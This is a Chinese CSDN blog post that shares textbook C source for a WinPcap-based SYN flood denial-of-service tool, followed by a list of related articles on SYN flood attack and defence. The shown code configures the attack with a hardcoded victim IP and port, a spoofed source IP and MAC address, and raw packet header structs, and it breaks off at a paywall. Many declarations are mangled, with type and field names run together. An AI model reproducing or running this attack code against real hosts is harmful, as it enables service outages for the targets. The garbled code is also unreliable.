SYN洪泛攻击(网络攻防原理与技术)

最新推荐文章于 2023-12-02 10:09:29 发布
VIP文章 最新推荐文章于 2023-12-02 10:09:29 发布
阅读量1.1k 收藏 5
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42578714/article/details/95107219
版权

第一次写博客,因为在调试那本书的代码的时候碰到很多问题,感谢CSDN的帮助,现在准备把调试好了的源码发出来给学弟学妹们分享,也供大家交流学习,本人很菜,如有问题,请多指正。

本段代码仅限于研究学习,禁止用于破坏活动,对于出现安全问题,本人概不负责!

运行环境:VS2013、WinPcap

 

#define WIN32_LEAN_AND_AND_MEAN
#define _WSPIAPI_COUNTOF

#include<winsock2.h>
#include<windows.h>
#include<stdio.h>
#include<stdlib.h>
#include<pcap.h>
#include<Packet32.h>

#pragma comment(lib,"ws2_32.lib")
#pragma comment(lib, "wpcap.lib")
#pragma comment(lib, "packet.lib")

#define MAXTHREAD  20
#define OID_802_3_CURRENT_ADDRESS  0x01010102
#define OPTION_LENTH  6

#define SYN_DEST_IP        "192.168.0.22"//被攻击IP
#define SYN_DEST_PORT      80//被攻击端口
#define FAKE_IP            "192.168.0.11"//伪装IP
#define FAKE_MAC           "\xB8\xAC\x6F\x1F\x26\xF6"//伪装MAC
//内存对齐必须是1
#pragma pack(1)
typedef struct et_header//以太网首部
{
	unsigned chareh_dst[6];//目的MAC
	unsigned chareh_src[6];//源MAC
	unsigned shorteh_type;//上层协议类型
}ET_HEADER;

typedef struct ip_hdr//IP首部
{
	unsigned charh_verlen;//版本与首部长度
	unsigned chartos;//区分服务
	unsigned shorttotal_len;//总长度
	unsigned shortident;//标识
	unsigned shortfrag_and_flags;//3位标志与13位的片偏移
	unsigned charttl;//生存时间
	unsigned charproto;//协议
	unsigned shortchecksum;//首部校验和
	unsigned intsourceIP;//源IP
	unsigned intdestIP;//目的IP
}IP_HEADER;
typedef struct tcp_hdr//TCP首部
{
	unsigned shortth_sport;//16位源端口
	unsigned shortth_dport;//16位目的端口
	unsigned intth_seq;//32位序列号
	unsigned intth_ack;//32位确认号
	unsigned shortth_data_flag;//16位标志位
	unsigned short_win;//16位窗口大小
	unsigned short_sum;//16位校验和
	unsigned short_urp;//16位紧急数据偏移量
	unsigned intoption[OPTION_LENTH];
}TCP_HEADER;
typedef struct psd_h
最低0.47元/天 解锁文章
鱼思源_dos
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
TCP协议的SYN Flood攻击原理详细讲解
10-09
SYN Flood攻击的影响也不容小觑,从攻击中可以看到,以SYN Flood为主的数十G流量,很容易就造成被攻击目标网络瘫痪。但TCP类的攻击远不止如此,本篇我们就来全面讲解基于TCP协议的各种DDoS攻击方式和防御原理
修改数据包发送到服务器不响应,当我使用原始套接字发送syn-packet时,为什么服务器不响应syn-ack数据包?...
weixin_39968995的博客
08-04 332
我正在尝试使用原始套接字,我刚刚编写了一个小程序,用于发送设置了syn标志的TCP数据包。我可以在服务器端看到与Wireshark一起发送的数据包,它们看起来不错,但服务器永远不会响应任何syn-ack数据包。我已将我的程序构造的syn数据包(请参阅下面的代码)与hping3发送的数据包进行比较(因为hping3的数据包总是得到syn-ack)。我的syn数据包和hping3的syn数据包之间唯一...
python检测和防御DOS攻击教程
m0_73896875的博客
07-06 639
windows开发,最后丢到linux中运行,需要安装python3.0+版本在linux中。利用Python编程实现对wrk的泛洪攻击检测,并让程序触发调用Linux命令实现防御:1、泛洪攻击的检测,可以考虑使用的命令,这些命令可以通过Python进行调用和分析。(5)top -n 1获取CPU的使用率(6)uptime 获取CPU的平均负载(7)ss -lnt 显示监听状态下的队列情况:ss -lnt(8)/opt/lampp/logs/access_log Web服务器访问日志。
常见的网络数据包的数据结构
p8x8x8的专栏
06-07 1637
//================================================//文件名:MNetWorkPKT.h//常见的网络数据包的数据结构//================================================//前言说明//================================================//1个字节
Linux下ack攻击脚本,linux 防御SYN攻击步骤详解
weixin_34274601的博客
04-30 263
一、默认syn配置sysctl -a | grep _synnet.ipv4.tcp_max_syn_backlog = 1024net.ipv4.tcp_syncookies = 1net.ipv4.tcp_synack_retries = 5net.ipv4.tcp_syn_retries = 5tcp_max_syn_backlog 是SYN队列的长度,加大SYN队列长度可以容纳更多等待连接...
2017-2018-2 20179306 《网络攻防技术》SQL注入、TCP/IP网络协议攻击实验
weixin_30836759的博客
05-13 584
SQL注入实验 实验介绍 在本次实验中,我们修改 phpBB的web应用程序,并且关闭了phpBB实现的一些对抗SQL注入的功能。因而我们创建了一个可以被SQL注入的phpBB版本。尽管我们的修改是人工的,但是它们代表着web开发人员的一些共同错误。学生的任务是发现SQL注入漏洞,实现攻击者可以达到的破坏,同时学习抵挡这样的攻击技术。 预备知识 1、 SQL语言 结构化查询语言(St...
【网络编程】SYN Flood (SYN洪水攻击) 源代码分析
热门推荐
jiange_zh的博客
01-01 2万+
一.原理1、TCP握手协议第一次握手:建立连接时,客户端发送syn包(syn=j)到服务器,并进入SYN_SEND状态,等待服务器确认;第二次握手:服务器收到syn包,必须确认客户的SYN(ack=j+1),同时自己也发送一个SYN包(syn=k),即SYN+ACK包,此时服务器进入SYN_RECV状态;第三次握手:客户端收到服务器的SYN+ACK包,向服务器发送确认包ACK(ack=k+1),此包
使用winpcap定制TCP包发送
weixin_34309543的博客
05-15 419
前些时候做DOS方面的测试,由于协议学得不够好,有些回应不记得,所以就首先想到用hping来定制一些包,看看远程主机的回应。结果下载 的hping死活都不发包,换了多个不同版本的winpcap都不行。一怒之下,决定自己写个简单的。首先想到的是perl来做,最后觉得一样要安装 winpcap还有很多别的模块,不如直接c来实现一下,来得更痛快。 需要说明一下的是,在以太网头那里...
TCP/IP详解 第十二章(6) 如何防御 SYN 攻击
caofengtao1314的专栏
06-04 360
如何防御 SYN 攻击? 这里给出几种防御 SYN 攻击的方法: 增大半连接队列; 开启 tcp_syncookies 功能 减少 SYN+ACK 重传次数 方式一:增大半连接队列 在前面源码和实验中,得知要想增大半连接队列,我们得知不能只单纯增大 tcp_max_syn_backlog 的值,还需一同增大 somaxconn 和 backlog,也就是增大全连接队列。否则,只单纯增大 tcp_max_syn_backlog 是无效的。 增大 tcp_max_syn_.
网络扫描技术揭秘读书笔记3--TCP SYN扫描
神探
12-17 3524
TCP SYN扫描 使用Winpcap库实现 核心代码 需要改进的问题: 线程结束的控制 处理多个IP的返回结果 void CPortScan_TCPDlg::SynScan_By_WinpCap(UNIONIP uIPBegin,UNIONIP uIPEnd,UINT uPortBegin,UINT uPortEnd) { MessageBox(_T("sys scan
网络篇之三次握手(SYN+ACK)
weixin_46381158的博客
01-26 1756
介绍tcp三次握手中的第二次握手(SYN+ACK)的发送过程
SYN攻击原理以及防范技术参照.pdf
02-22
SYN攻击原理以及防范技术参照.pdf
SYN flood网络攻击原理及其防御方法.docx
09-30
SYN flood网络攻击原理及其防御方法.docx
SYN_Flooding网络攻击原理、检测及防御技术
06-26
SYN_Flooding网络攻击原理、检测及防御技术,适合无线传感网络的洪泛攻击学习
SYN flood 攻击检测技术综述
10-20
分析SYN flood attack攻击原理,并在此基础上研究几种典型的SYN flood 攻击检测方法。对主要技术进行分析和比较,这些技术均有各自的优点和局限性,多种方法有机融合互补将成为SYN flood 攻击检测研究的重点。
渗透测试——三、脚本编写
最新发布
钟言的博客
12-02 4743
本篇为渗透测试的第三课,黑客实践之脚本编写,详细内容包含了:认识Python语言 1、Python语言概况 2、Python的特点 3、Python集成开发环境 4、Python环境的安装 编写Python扫描程序 1、Python 第三方模块 2、Socket模块 3、Scapy模板 4、利用Nmap模板扫描存活主机 5、构造TCP包扫描端口 6、利用Socket模块扫描端口 编写Python攻击脚本 1、ARP协议 2、SYN泛洪 3、字典攻击4、ARP欺骗攻击 5、SYN泛洪攻击 6、生成数据字典等等
木马的攻击与防御(MSF)
weixin_45605352的博客
04-12 6465
MSF简介 Metasploit是一个免费的、可下载的框架, 通过它可以很容易地 获取、开发并对计算机软件漏洞实施攻击。它本身 附带数百个 已知软件漏洞的专业级漏洞攻击工具。它集成了以下4个模块: exploits模块 漏洞攻击模块列表,入侵式 命名规则 模块/系统/服务/名称 payloads模块 漏洞负载模块与exploits模块配合使用的用于入侵后的操作 auxiliary模块 辅助模块,通常用于没有攻击荷载的漏洞攻击。 encoders模块 编码器模块,用于msfvenom -e or
针对TCP SYN洪泛攻击的防御
mypop的专栏
01-27 4341
<br />尽管这种攻击已经出现了十四年,但它的变种至今仍能看到。虽然能有效对抗SYN洪泛技术已经存在,但是没有对于TCP实现的一个标准的补救方法出现。你可以在如今的操作系统和设备中找到保护应用层和网络层的不同解决方案的不同实现。本篇论文详细描述这种攻击并展望和评估现在应用于终端主机和网络设备的对抗SYN洪泛方法。<br /><br />1 基本的漏洞<br />SYN洪泛攻击首次出现在1996年。当时Phrack杂志中描述了这种攻击并用代码实现了它[1]。这些信息被迅速应用于攻击一个网络服务提供商(IS
论述SYNFlood攻击及防御原理
05-31
SYN Flood攻击是一种常见的网络攻击方式,它利用TCP协议中三次握手的漏洞,向目标服务器发送大量的伪造TCP连接请求,使得服务器无法响应正常请求,最终导致拒绝服务(DoS)甚至系统崩溃。 SYN Flood攻击原理是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值